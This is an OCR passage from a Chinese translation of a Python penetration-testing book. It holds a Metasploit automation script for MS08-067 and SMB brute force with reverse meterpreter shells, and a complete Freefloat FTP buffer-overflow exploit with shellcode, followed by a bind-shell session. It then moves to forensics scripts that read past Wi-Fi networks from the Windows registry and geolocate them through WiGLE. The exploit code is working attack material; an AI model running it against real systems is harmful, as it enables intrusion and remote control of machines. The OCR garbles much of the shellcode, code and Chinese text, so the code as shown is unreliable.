' + host 


return tgtHosts 


setupHandler(configFile, 
configFile. 
configFile. 


lhost, lport): 
write('use exploit/multi/handler\n' ) 
write('set PAYLOAD windows/meterpreter/reverse_tcp\r 


configFile.write('set LPORT ' + str(lport) + '\n') 
configFile.write('set LHOST ' + lhost + '\n') 
configFile.write('exploit -j -z\n') 

configFile.write('setg DisablePayloadHandler 1\n' ) 
confickerExploit(configFile, tgtHost, lhost, lport): 
configFile.write('use exploit/windows/smb/ms08_067_netapi\n' ) 
configFile.write('set RHOST ' + str(tgtHost) + '\n') 
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\r 
configFile.write('set LPORT ' + str(lport) + '\n') 
configFile.write('set LHOST ' + lhost + '\n') 
configFile.write('exploit -j -z\n') 

smbBrute(configFile, tgtHost, passwdFile, lhost, lport): 
username = 'Administrator' 

pF = open(passwdFile, 'r') 


for password in pF.readlines(): 


password = password.strip('\n').strip('\r') 
configFile.write('use exploit/windows/smb/psexec\n' ) 
configFile.write('set SMBUser ' + str(username) + '\n') 
configFile.write('set SMBPass ' + str(password) + '\n') 
configFile.write('set RHOST ' + str(tgtHost) + '\n') 
configFile.write('set PAYLOAD windows/meterpreter/reverse_1 
configFile.write('set LPORT ' + str(lport) + '\n') 
configFile.write('set LHOST ' + lhost + '\n') 
configFile.write('exploit -j -z\n') 


def main(): 


configFile = open('meta.rc', 'w') 


parser = optparse.OptionParser('[-] Usage%prog -H &lt;RHOST[s]é 
parser.add_option('-H', dest='tgtHost', type='string', help='s; 
parser.add_option('-p', dest='lport', type='string', help='spec 
parser.add_option('-1', dest='lhost', type='string', help='spec 
parser.add_option('-F', dest='passwdFile', type='string', help: 


(options, args) = parser.parse_args() 
if (options.tgtHost == None) | (options.lhost == 
print parser.usage 
exit(0) 
lhost = options.lhost 
lport = options.lport 
if lport == None: 
lport = '1337' 
passwdFile = options.passwdFile 
tgtHosts = findTgts(options.tgtHost) 
setupHandler(configFile, lhost, lport) 
for tgtHost in tgtHosts: 


None): 


confickerExploit(configFile, tgtHost, lhost, lport) 


if passwdFile != None: 
smbBrute(configFile, tgtHost, passwdFile, 
configFile.close() 
os.system('msfconsole -r meta.rc') 


if mame == '_main_': 
main() 
mi — K 


lhost, lport’ 





到 目前 为 止 我 们 利用 的 都 是 已 知 的 方法 攻击 的 。 然 而 ， 没 有 已 知 的 攻击 方法 的 目标 
主机 怎么 办 ? 你 怎样 建立 你 自己 的 0day 攻 击 ? 在 接 下 来 的 章节 中 ， 我 们 我 们 将 建立 


我 们 自己 的 0day 攻 击 。 


attacker# python conficker.py -H 192.168.1.30-50 -上 192.168.1.3 -F 


passwords.txt 
[+] Found Target Host: 192.168.1.35 
[+] Found Target Host: 192.168.1.37 
[+] Found Target Host: 192.168.1.42 
[+] Found Target Host: 192.168.1.45 
[+] Found Target Host: 192.168.1.47 
<..SNIPPED. ,> 
[*] Selected Target: Windows XP SP2 English (AlwaysoOn 
[*] Attempting to trigger the vulnerability... 
[*] Sending stage (752128 bytes) to 192.168.1.37 
[*] Meterpreter session 1 opened (192.168.1.3:1337 -> 
<..SNIPPED. .> 
[*] Selected Target: Windows XP SP2 English (AlwaysOn 
[*] Attempting to trigger the vulnerability... 
[*] Sending stage (752128 bytes) to 192.168.1.42 
[*] Meterpreter session 1 opened (192.168.1.3:1337 -> 


‘ = 





NX) 


192.168.1.37 


NX) 


192.168.1.42 





编写 你 自己 的 0day POC 代 码 


上 一 节 的 Conficker 蠕 虫 利 用 的 是 堆栈 溢出 漏洞 。Metasploit 框 架 包 含 了 几 百 种 独 一 
无 二 的 exploit， 你 可 能 碰 到 要 你 自己 写 的 远程 代码 执行 的 exploit 的 代码 。 这 一 节 我 
们 将 讲解 怎样 用 Python 简化 这 一 过 程 。 为 了 做 到 这 些 ， 我 们 要 开始 讲解 缓冲 区 溢出 
的 知识 。 


Morris 蠕 正成 功 的 部 分 原因 是 Finger 服 务 的 堆栈 缓冲 区 溢出 的 漏洞 利用 。 这 类 攻击 
的 成 功 是 因为 程序 验证 用 户 输 入 的 失败 所 导致 。 尽 管 Morris 蠕 虫 在 1988 年 利用 了 扒 
栈 缓 冲 区 溢出 漏洞 ， 直 到 1996 年 Elias Levy 才 发 表 了 一 篇 学 术 论 文 为 “Smashing the 
Stack for Fun and Profit" 在 Phrack 和 杂志 上 。 如 果 你 对 堆栈 缓冲 区 溢出 攻击 的 原理 不 
熟悉 的 话 ， 想 了 解 更 多 ， 可 以 仔细 阅读 这 篇 文章 。 就 我 们 的 目的 而 言 ， 我 们 会 花 时 
间 讲 解 堆 栈 缓冲 区 溢出 攻击 的 关键 技术 。 


基于 堆栈 的 缓冲 区 溢出 攻击 


对 于 堆栈 缓冲 区 溢出 来 说 ， 未 经 检查 的 用 户 数 据 和 覆盖 了 下 一 个 指令 EIP 从 而 控制 程 
序 的 流程 。Exploit 直 接 将 EIP 寄 存 器 指向 攻击 者 插入 ShellCode 的 位 置 。 一 系列 的 机 
器 代码 ShellCode 能 允许 exploit 在 目标 系统 里 增加 用 户 ， 连 接 攻击 者 或 者 下 载 一 个 
独立 的 可 执行 文件 。ShellCode 有 无 尽 的 可 能 性 存在 ， 完 全 取决 于 内 存 空间 的 大 

小 。 


在 存在 很 多 种 编写 exploit 方 法 的 今天 ， 基 于 堆栈 缓冲 区 溢出 的 方法 提供 了 原始 的 
exploit 向 量 。 而 且 大 量 的 exploit 还 在 增加 。2011 年 7 月 ， 我 的 一 个 朋友 发 布 了 一 个 
针对 脆弱 的 FTP 服 务 器 的 exploit。 虽 然 开发 exploit 似 乎 是 一 个 很 复杂 的 任务 ， 但 实 
际 的 攻击 代码 却 少 于 80 行 (包含 约 30 行 的 shell 代 码 )。 


添加 攻击 的 关键 元 素 


让 我 们 开始 构建 我 们 的 exploit 的 关键 元 素 。 首 先 我 们 设置 我 们 的 shellcode 变 量 包 含 
Metasploit 框 架 为 我 们 生成 的 十 六 进 制 编码 的 攻击 荷载 。 接 下 来 我 们 设置 我 们 的 溢 
出 变量 包含 246 个 字母 A 的 实例 (16 进 制 为 \x41 )。 我 们 返回 的 地 址 变量 指向 一 

个 kernel.dll 地 址 ， 包 人 钨 了 一 个 直接 跳 到 栈 顶 端的 指令 。 我 们 填充 包 含 一 系列 
150 个 NOP 指令 的 变量 。 这 构建 了 我 们 的 NOP 滑 铲 。 最 后 我 们 集合 所 有 的 变量 组 
成 一 个 变量 ， 我 们 称 为 碰撞 。 


基于 堆栈 缓冲 区 溢出 exploit 的 基本 要 素 


溢出 : 用 户 的 输入 超过 了 预期 在 栈 中 分 配 的 值 。 


返回 地 址 : 被 用 来 直接 跳 转 到 栈 顶 端的 4 个 字 节 的 地 址 。 在 接 下 来 的 exploit 中 ， 我 
们 用 4 个 字 节 的 地 址 指向 kernel.dll 的 JMP ESP 指令 。 


填充 物 : 在 shellcode 之 前 的 一 系列 的 NOP ( 空 指令 ) 指 令 。 人 允许 攻击 者 猜测 直接 跳 
到 的 地 址 。 如 果 攻 击 者 跳 到 NOP 滑 铲 的 任何 地 方 ， 它 将 直接 滑 到 shellcode。 


Shellcode : 一 小 段 汇编 机 器 码 。 在 下 面 的 例子 中 ， 我 们 将 利用 Metasploit 生 成 
Shellcode 代 码 。 


shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xF4\x5d\ x33" 
"\xb1i\x56\x83\xc5\xO4\x31\x7d\xOF\XO3\x7d\x53\xc8\xe4\x4F" 
"\X83\x85\x07\xbO\x53\xf6\x8e\xX55\x62\xX24\xF4\x1le\xd6\xf8" 
"\x7e\x72\xda\x73\xd2\x67\x69\xfi\xfo\x88\xda\xbc\xdd\xa7" 
"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5" 
"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c" 
"\x56\XxX22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\xQOc\x91\xfO" 
"\X48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49" 
"\X19\xe6\x91\xX65\xX94\xF6\xXd6\xX42\x46\x8d\x2c\xbi\xfo\x96" 
"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82" 
"\xce\x10\xc3\x86\xd1i\xf5\x7F\xb2\x5a\xf8\xaf\x32\x18\xdF" 
"\x6b\x1le\xfo\x7e\x2d\xfa\xaa\x7 f\x2d\xa2\x13\xda\x25\x41" 
"\x40\x5cC\x64\x0e\xa5\x53\x97\xce\xal\xe4\xe4\xfo\x6e\x5F" 
"\xX63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a" 
"\x88\x6e\x5C\x3b\xbO\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b" 
"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a" 
"\xde\xf4\x5b\x8c\xfi\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3" 
"\xeO\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea" 
"\xea\xc9O\xf3\xX7d\x78\x02\xcO\x9C\x7F\XOF\x60\xd6\xb8\xd8" 
"\xfa\x86\xOb\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6" 
"\xac\x31\x64\x1F\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea" 
"\x7a\xfc\xe3\x7Ff\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30" 
"\xX1A\xdO\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53" 
"\X41\x28\xO1\xe5\x3c\x6d\x3e\xca\xa8\x79\xX47\xX36\x49\x85" 
"\xX92\xFf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7F\x2a\x86\x25" 
"\xX86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10" 
"\xba\x1e\x53\x31" ) 

overflow = "\x41" * 246 

ret = struct.pack('&lt;L', 0x7C874413) #7C874413 JMP ESP kernel32 

padding = "\x90" * 150 

crash = overflow + ret + padding + shellcode 





Rik exploit 


使 用 伯克利 套 接 字 API， 我 们 将 创建 一 个 到 我 们 目标 主机 21 端 口 的 TCP 连 接 。 如 果 
连接 成 功 ， 我 们 将 通过 发 送 匿名 的 用 户 名 和 密码 的 到 了 主机 的 认证 。 最 后 我 们 将 发 
送 FTP 命 令 “RETR" 紧 接着 是 我 们 的 碰撞 变量 。 由 于 受 影响 的 程序 没有 正确 的 过 滤 用 
户 的 输入 ， 这 将 导致 堆栈 的 缓冲 区 溢出 覆盖 了 EIP 寄 存 器 允许 我 们 的 程序 直接 跳 到 
并 执行 我 们 的 Shellcode 代 码 。 


s = socket.socket(socket.AF_INET, socket .SOCK_STREAM) 
try: 
s.connect((target, 21)) 
except: 
print "[-] Connection to "+target+" failed!" 
sys.exit(0) 
print("[*] Sending " + 'len(crash)' + " " + command +" byte crash. 
s.send("USER anonymous\r\n") 
s.recv(1024) 
s.send("PASS \r\n") 
s.recv(1024) 
s.send( "RETR" +" " + crash + "\r\n") 
time.sleep(4) 





整合 整个 exploit 脚 本 
把 所 有 的 代码 整合 在 一 起 ， 我 们 有 Craig Freyman 发 布 的 原始 的 exploit 。 


#!/usr/bin/Python 
# coding=UTF-8 


#Title: Freefloat FTP 1.0 Non Implemented Command Buffer Overflows 
#Author: Craig Freyman (@cd1zz) 

#Date: July 19, 2011 

#Tested on Windows XP SP3 English 

#Part of FreeFloat pwn week 

#Vendor Notified: 7-18-2011 (no response) 

#Software Link:http://www.freefloat.com/sv/freefloat-ftp-server/fre 


import socket, sys, time, struct 


if len(sys.argv) &lt; 2: 
print "[-]Usage:%s &lt;target addr&gt; &lt;command&gt;"% sys.ai 
print "[-]For example [filename.py 192.168.1.10 PWND] would do 
print "[-]Other options: AUTH, APPE, ALLO, ACCT" 
sys.exit(0) 

target = sys.argv[1] 

command = sys.argv[2] 

if len(sys.argv) &gt; 2: 
platform = sys.argv[2] 

#./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikaté 

#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) 

shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xF4\x5d\ x33" 
"\xXbA\X56\x83\xXC5\x04\xX31\xX7d\xOF\XO3\x7d\x53\xc8\xe4\x4F" 
"\X83\xX85\x07\xbO\x53\xf6\x8eE\x55\x62\x24\xF4\x1e\xd6\xf8" 
"\x7e\X72\xda\x73\xd2\x67\x69\xfi\xfo\x88\xda\xbc\xdd\xa7" 
"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5" 
"\xd8\xa5\x68\xa7\xb1i\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c" 


"\X56\X22\xX1C\X43\xX22\xX98\X1LF\X94\x9A\X97\X68\XOC\X9L\x FO" 
"\xX48\x2d\x76\xe3\xb5\x64\xF3\xdO0\x4e\x77\xd5\x28\xae\x49" 
"\xX19\xe6\x91\xX65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1i\xfb\x96" 
"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82" 
"\xce\x10\xc3\x86\xd1i\xf5\x7F\xb2\x5a\xf8\xaf\x32\x18\xdF" 
"\x6b\x1le\xfo\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41" 
"\x40\x5c\x64\x0e\xa5\x53\x97\xce\xal\xe4\xe4\xfco\x6e\x5F" 
"\xX63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a" 
"\x88\x6e\x5C\x3b\xbO\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b" 
"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a" 
"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\xX25\x33\xb3" 
"\xeO\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea" 
"\xea\xc9O\xf3\xX7d\x78\x02\xcO\x9C\x7F\xXOF\x60\xd6\xb8\xd8" 
"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6" 
"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea" 
"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30" 
"\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53" 
"\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85" 
"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25" 
"\xX86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10" 
"\xba\x1e\x53\x31") 

#7C874413 FFE4 JMP ESP kernel32.dll 

ret = struct.pack('&lt;L', QOx7C874413) 

padding = "\x90" * 150 

crash = "\x41" * 246 + ret + padding + shellcode 

print "\ 
[*] Freefloat FTP 1.0 Any Non Implemented Command Buffer Overf: 
[*] Author: Craig Freyman (@cd1zz)\n\ 
[*] Connecting to "+target 

s = socket.socket(socket.AF_INET, socket .SOCK_STREAM) 

try: 
s.connect((target, 21)) 

except: 
print("[-] Connection to "+target+" failed!") 
sys.exit(0) 

print("[*] Sending " + 'len(crash)' + " " + command +" byte crash. 

s.send("USER anonymous\r\n") 

s.recv(1024) 

s.send("PASS \r\n") 

s.recv(1024) 

s.send(command +" " + crash + "\r\n") 

time.sleep(4) 


al = : 


下 载 并 复制 一 个 FreeFloat FTP2] Windows XP SP23 # Windows XP SP3 的 电脑 上 
之 后 ， 我 们 可 以 测试 Craig Freyman 的 exploit。 注 意 ， 他 用 的 shellcode 是 绑 定 了 
TCP 端 口 4444 的 脆弱 的 目标 。 所 以 我 们 可 以 运行 我 们 的 exploit 脚 本 或 者 netcat 连 
接 到 目标 主机 的 4444 端 口 。 如 果 一 切 都 成 功 了 ， 现 在 我 们 已 经 获取 了 目标 主机 的 命 
令 行 提示 。 





attacker$ python freefloat2-overflow.py 192.168.1.37 PWND 

[*] Freefloat FTP 1.0 Any Non Implemented Command Buffer Overflow 
[*] Author: Craig Freyman (@cd1zz) 

[*] Connecting to 192.168.1.37 

[*] Sending 768 PWND byte crash... 

attacker$ nc 192.168.1.37 4444 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C:\Documents and Settings\Administrator\Desktop\&gt; 


‘| 加 时 as) 





音 总 ot 
总 结 


KER! 在 我 们 的 渗透 测试 中 我 们 可 以 使 用 我 们 自己 编写 的 工具 。 我 们 通过 编写 我 
a i ， FTP，SMB 协 议 的 攻击 方法 ， 最 后 我 们 
用 Python 构建 了 我 们 自己 的 0day exploit 。 

我 希望 你 在 无 穷 无 尽 的 渗透 测试 中 自己 编写 代码 。 为 了 推进 和 提高 我 们 的 渗透 测 


试 ， RITEAR A T Python AA 后 的 基础 知识 。 现 在 我 们 有 一 个 更 好 的 了 解 
Python 的 机 会 ， 让 我 们 研究 一 下 怎样 编写 用 于 法 庭 调查 取证 的 脚本 。 


1. 通过 Windows 注 册 表 定位 

2. 回收 站 调查 

3. 审查 PDF 和 DOC 文 件 的 元 数据 

4. 从 Exif 元 数据 中 提取 GPS 坐标 

5. 探究 Skype 结 构 

6. 从 火狐 的 数据 库 中 枚 举 浏 览 器 结构 
7. 审查 移动 设备 结构 


最 终 ， 你 必须 忘记 技术 。 你 越 是 进步 ， 教 导 的 也 就 越 少 ， 伟 大 的 路 


的 道路 的 。 


ax 
Re 
这 
ja 
Fa 


---Ueshiba Morihei, Kaiso, Founder, Aikido 


引文 : 如 何 解 决 BTK 谋 杀 和 案 


2005 年 2 月 ? Wichita 方 取证 调 #Randy Stone %E > 4 FF 了 一 件 尘 封 了 30 年 的 案 
件 的 神秘 面纱 。 几 天 前 ， 


KSAS 电 视 台 提交 给 警方 了 一 个 他 们 从 自 名 昭著 的 BTK (She > BA > AR) HA 
手 那里 接收 到 的 软盘 。1974 年 至 1991 年 的 至 少 十 起 谋杀 案 中 ，BTK 的 杀手 故意 留 下 
蛛丝马迹 ， 来 嘲弄 警察 和 受害 者 。2005 年 2 月 16 日 ，BTK 的 杀手 给 电视 台 邮 寄 了 一 
个 包含 指令 的 软盘 ， 在 这 些 指令 中 ， 磁 盘 包 含 了 一 个 叫做 Test.A.rtf (Regan, 
2006)。 然 而 这 份 文 件 包 含 了 BTK 杀 手指 令 的 同时 ， 也 包含 了 一 些 别 的 东西 : 元 数 
据 。 在 这 份 微软 的 RTF 格 式 文件 中 ， 包 含 了 杀手 的 名 字 和 地 理 位 置 。 这 帮助 了 案件 
的 破获 ， 最 终 人 警察 确认 Denis Rader 就 是 BTK 的 杀手 ， 案 件 最 终 告破 。 


计算 机 取证 调查 只 需要 好 的 调查 员 和 他 的 好 工具 。 调 查 员 往往 有 很 多 挑剔 的 问题 ， 
但 没有 工具 能 解决 他 们 的 问题 。 进 入 Python。 在 前 几 章 我 们 看 到 ， 解 决 复杂 的 问题 
只 用 极 少 的 代码 证 明了 Python 编程 语言 的 实力 。 正 如 我 们 将 在 下 面 章节 中 看 到 的 ， 
我 们 能 用 极 少 数 的 Python 代码 解决 复杂 的 问题 。 让 我 们 开始 用 一 些 独特 的 Windows 
注册 表 来 物理 跟踪 用 户 吧 。 


你 去 哪里 了 ? --- 在 注册 表 中 分 析 无 线 接 入 点 


Windows 注 册 表 包含 了 一 个 存储 操作 系统 配置 设置 的 层次 化 数据 库 。 随 着 无 线 网 的 
出 现 ，Windows 注 册 表 存储 了 与 无 线 连接 相关 的 信息 。 了 解 注册 表 键 值 的 位 置 和 意 
义 可 以 为 我 们 提供 详细 的 笔记 本 到 过 的 地 理 位 置 。 从 Windows Vista 之 后 ， 注 册 表 
存储 每 一 个 网 络 信息 

在 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Net 
子 键 值 下 。 从 Windows 命 令 提示 符 ， 我 们 可 以 列 出 每 一 个 网 络 显示 描述 GUID， 网 
络 描述 ， 网 络 名 称 和 网 关 MAC 地 址 。 


C:\Windows\system32>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsot 
Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged" /s 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\NetworkList\Sign 
atures\Unmanaged\010103000FO000FO080000000F0000FO4BCC2360E4B8F 7DC8I 


AB8AE4DAD8 
62E3960B9 79A7AD52FA5F70188E103148 
ProfileGuid REG_SZ {3B24CE70-AA79 -4C9A-B9CC - 83F90C2C9COD} 
Description REG_SZ Hooters_San_Pedro 
Source REG_DWORD 0x8 
DnsSuffix REG_SZ <none> 
FirstNetwork REG_SZ Public_Library 


DefaultGatewayMac REG_BINARY 00115024687F0000 





使 用 WinReg 读 取 Windows 注 册 表 


注册 表 存 储 的 网 关 MAC 地 址 作为 REG_BINARY 类 型 。 在 前 面 的 例子 中 ，16 进 

制 \xOO\x11\x50\x24\x68\X7F\XOO\X0O 表示 的 实际 地 址 

为 00:11:50:24:68:7F 。 我 们 将 写 一 个 快速 的 函数 将 REG_BINARY 的 值 转换 为 
实际 的 MAC 地 址 。 在 后 面 我 们 将 会 看 到 无 线 网 络 的 MAC 地 址 是 有 用 的 。 


def val2addr(val): 
addr = "" 
for ch in val: 
addr += ("%02x "% ord(ch)) 
addr = addr.strip(" ").replace(" ",":")[0:17] 
return addr 


现在 ， 让 我 们 来 编写 一 个 函数 从 Windows 注 册 表 键 值 中 获取 每 一 个 列 出 来 的 网 络 的 
网 络 名 称 和 MAC 地 址 。 为 此 ， 我 们 将 利用 _winreg 模块 ，Windows 版 的 Python 默 
认 安 装 的 模块 。 连 接 到 注册 表 后 ， 我 们 可 以 使 用 0penKey() 函数 打开 键 ， 并 循环 
获取 键 下 面 的 网 络 描述 。 对 于 每 一 个 描述 ， 包 含 下 面子 键 : ProfileGuid 
Description , Source , DnsSuffix , FirstNetwork 
DefaultGatewayMac 。 网 络 名 称 和 网 关 MAC 地 址 在 注册 表 键 列表 中 的 第 四 个 和 第 
五 个 。 现 在 我 们 可 以 枚 举 每 一 个 键 ， 并 在 屏幕 上 面 打印 出 来 。 


把 所 有 的 组 合 在 一 起 ， 现 在 我 们 有 一 个 脚本 将 打印 存储 在 注册 表 中 的 先前 连接 的 无 
线 网 络 的 信息 。 


# coding=UTF-8 
import _winreg 


def val2addr(val): 
addr = "" 
for ch in val: 
addr += ("%02x "% ord(ch) ) 


addr = addr.strip(" ").replace(" ",":")[0:17] 
return addr 


def printNets(): 
net = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkLisi 
key = _winreg.O0penKey(_winreg.HKEY_LOCAL_MACHINE, net) 
print '\n[*] Networks You have Joined. ' 
for i in range(100): 
try: 
guid = _winreg.EnumKey(key, i) 
netKey = _winreg.OpenKey(key, str(guid) ) 
(n, addr, t) = _winreg.EnumValue(netKey, 5) 
(n, name, t) = _winreg.EnumValue(netKey, 4) 
macAddr = val2addr (addr) 
netName = str(name) 


print '[+] ' + netName + ' ' + macAddr 
_winreg.CloseKey(netKey) 
except: 
break 
def main(): 
printNets() 
if _name__ == "__main_": 
main() 





在 我 们 的 目标 笔记 本 上 运行 我 们 的 脚本 ， 我 们 可 以 看 到 先前 连接 过 的 无 线 网 络 及 其 
MAC 地 址 。 当 测试 脚本 时 ， 确 保 使 用 管理 员 权 限 运 行 的 脚本 ， 和 否则 将 无 法 读 取 注册 
表 键 值 。 


C:\Users\investigator\Desktop\python discoverNetworks. py 
[*] Networks You have Joined. 

[+] Hooters_San_Pedro, 00:11:50:24:68:7F 

[+] LAX Airport, 00:30:65:03:e8:c6 

[+] Senate_public_wifi, 00:0b:85:23:23:3e 


使 用 Mechanize 将 MAC 地 址 提交 到 Wigle 


然而 ， 脚 本 不 会 在 次 结束 。 随 着 获得 无 线 接 入 点 的 MAC 地 址 ， 我 们 现在 开 可 以 打印 
出 无 线 接 入 点 的 物理 位 置 。 有 相当 多 的 数据 库 ， 包 括 开源 的 和 专 有 的 ， 包 含 了 大 量 
与 无 线 接 入 点 物理 位 置 相 关 的 信息 。 专 利 产品 ， 如 手机 就 是 使 用 这 样 的 地 理 位 置 的 
数据 库 而 没有 使 用 GPS 。 


SkyHook 数 据 库 ， 可 以 在 http://www.skyhookwireless.com/ 找到 。 提 供 了 一 个 基于 
WIFI 接 入 点 的 软件 开发 工具 包 。lan McCracken 开 发 的 一 个 开源 项 目 提供 了 提供 了 
对 这 个 数据 库 的 访问 能 力 在 http://code.google.com/p/maclocate/ 网 站 。 然 而 ， 最 
近 ，SkyHook 改 变 了 SDK 而 是 使 用 API 密 钥 来 使 用 数据 库 。Google 也 维护 这 同样 大 
的 数据 库 用 于 关联 无 线 接 入 点 的 MAC 地 址 到 物理 位 置 。 然 而 ， 不 久 后 ， 不 久 后 ， 
Gorjan Petrovski 开 发 了 一 个 NMAP NSE 脚 本 来 和 Google 的 数据 库 进 行 交互 。 
Google 反 对 开源 代码 和 他 的 数据 库 进 行 交 互 。 不 久之 后 ， 由 于 隐私 问题 ， 微 软 也 关 
闭 了 类 似 的 WIFI 物理 位 置 数据 库 。 


剩 下 的 数据 库 和 开源 项 目 WiGLE.net 继 续 允 许 用 户 通过 无 线 接 入 点 的 搜索 物理 位 
置 。 注 册 一 个 账号 之 后 ， 用 户 就 能 通过 一 个 小 的 Python 和 脚本 和 wigle.net 进 行 交 互 。 
让 我 们 快速 检查 如 何 建立 一 个 脚本 与 WiGLE.net 交 互 。 


使 用 WiGLE. Net， 用 户 很 快 就 会 意识 到 为 了 得 到 WiGLE 他 必须 与 第 三 方 的 页 面 进 

行 交 互 。 首 先 ， 用 户 必须 打开 WiGLE.net 的 初始 化 页 面 在 https://wigle.net/ 网 页 ; 

然后 用 户 必 须 登 陆 到 WiGLE 在 https://wigle.net/ 页 面 。 最 后 ， 用 户 可 以 查询 特定 的 
无 线 SSID 的 MAC 地 址 在 https://wigle.net/ 页 面 。 捕 获 MAC 地 址 查询 请 求 ， 我 们 可 
以 看 到 在 请 求 无 线 接 入 点 的 GPS 地 址 的 HTTP POST 请 求 中 tnetid( 网 络 标识 符 ) 包 含 
了 MAC 地 址 。 


POST /gps/gps/main/confirmquery/ HTTP/1.1 
Accept-Encoding: identity 

Content-Length: 33 

Host: wigle.net 

User-Agent: AppleWebKit/531.21.10 

Connection: close 

Content-Type: application/x-www-form-urlencoded 
netid=0A%3A2C%3AEF%3A3D%3A25%3A1B 

< SNIPPED .> 


此 外 ， 我 们 看 到 从 页 面 响应 的 数据 中 包含 了 GPS 坐标 。 字 符 
# maplat=47.25264359&maplon=-87.25624084 包含 了 接 入 点 的 经 度 和 纬度 。 


<tr class="search"><td> 

<a href="/gps/gps/Map/onlinemap2/?maplat=47 .25264359&amp ; maplon=- 
87 .25624084&amp ; mapzoom=17&amp; ssid=McDonald's FREE Wifi&amp;netid- 
25:1B">Get Map</a></td> 

<td>0A:2C:EF:3D:25:1B</td><td>McDonald's FREE Wifi</td>< 


<] — g 
有 了 这 些 信息 ， 我 们 现在 足够 建立 建立 一 个 简单 的 函数 用 来 返回 WiGLE 数 据 库 中 记 


录 的 无 线 接 入 点 的 的 经 度 和 纬度 。 注 意 ， 要 使 用 mechanize 模块 。 可 以 从 
http://wwwsearch.sourceforge.net/mechanize/ 网 站 获得 该 模块 。 mechanize 允 





许 通 过 Python 进行 WEB 状 态 编程 ， 类 似 于 urllib2 模块 的 功能 。 这 就 意味 着 ， 一 


旦 我 们 正常 的 登陆 到 WiGLE 服 务 ， 它 就 会 存储 和 重用 我 们 的 验证 cookie 


import mechanize, urllib, re, urlparse 


def wiglePrint(username, password, netid): 
browser = mechanize.Browser() 
browser.open('http://wigle.net') 


reqData = urllib.urlencode({'credential_O': username, 


browser .open('https://wigle.net/gps/gps/main/login', 
params = {} 

params['netid'] = netid 

reqParams = urllib.urlencode(params) 


o 


'credent: 
reqData) 


respURL = 'http://wigle.net/gps/gps/main/confirmquery/' 


resp = browser.open(respURL, reqParams).read() 
mapLat = 'N/A' 
mapLon = 'N/A' 
rLat = re.findall(r'maplat=.*\&amp;', resp) 
if reat: 

mapLat = rLat[0].split('&amp;')[0].split('=')[1] 
rLon = re.findall(r'maplon=.*\&amp;', resp) 


if rLon: 
mapLon = rLon[0].split 
print('[-] Lat: ' + mapLat + ', Lon: ' + mapLon) 


E 





添加 WiGLE MAC 地 址 查询 功能 到 我 们 原来 的 脚本 。 我 们 现在 有 能 力 检查 注册 表 中 


以 前 连接 过 的 无 线 接 入 点 并 查询 他 们 的 物理 位 置 。 


# coding=UTF-8 
import optparse 
import mechanize 
import urllib 
import re 

import _winreg 


def val2addr(val): 
addr = "" 
for ch in val: 
addr += ("%02x " % ord(ch)) 
addr = addr.strip(" ").replace(" ", ":")[0:17] 
return addr 


def wiglePrint(username, password, netid): 
browser = mechanize.Browser() 
browser .open( 'http://wigle.net') 
reqData = urllib.urlencode({'credential 0': username, 
browser .open('https://wigle.net/gps/gps/main/login', 
params = {} 
params['netid'] = netid 
reqParams = urllib.urlencode(params) 


'credent: 
reqData) 


respURL = 'http://wigle.net/gps/gps/main/confirmquery/' 
